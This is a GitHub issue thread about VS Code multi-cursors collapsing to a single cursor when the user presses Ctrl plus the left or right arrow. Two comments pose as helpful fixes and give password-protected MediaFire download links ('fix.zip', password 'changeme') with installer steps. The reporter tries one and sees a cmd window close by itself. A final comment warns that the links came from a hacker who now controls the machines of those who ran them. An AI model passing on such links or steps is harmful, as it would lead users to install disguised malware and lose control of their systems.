### ISSUE TITLE
multi cursor collapse to single cursor when using ctrl + left/right arrow

### ISSUE THREAD

**Issue by TrymenT-AlphA** [microsoft/vscode#226937]
Does this issue occur when all extensions are disabled?: Yes

- VS Code Version: 1.92.2
- OS Version: windows11

Steps to Reproduce:

1. use alt + shift + ctrl + up/down to create multi cursor
2. use ctrl + left/right to move cursor

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TrymenT-AlphA** [comment]
@bkballoon thanks for reply, but i can not run it successfully

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by TrymenT-AlphA** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

thank you, i tried but the cmd closed itslef and the problem remains

**Comment by TrymenT-AlphA** [comment]
i dont know why but the problem disappears, i will colse the issue

**Comment by ellensp** [comment]
the mediafire  link above was from a hacker, if you downloaded and ran it your machine is now under their control.
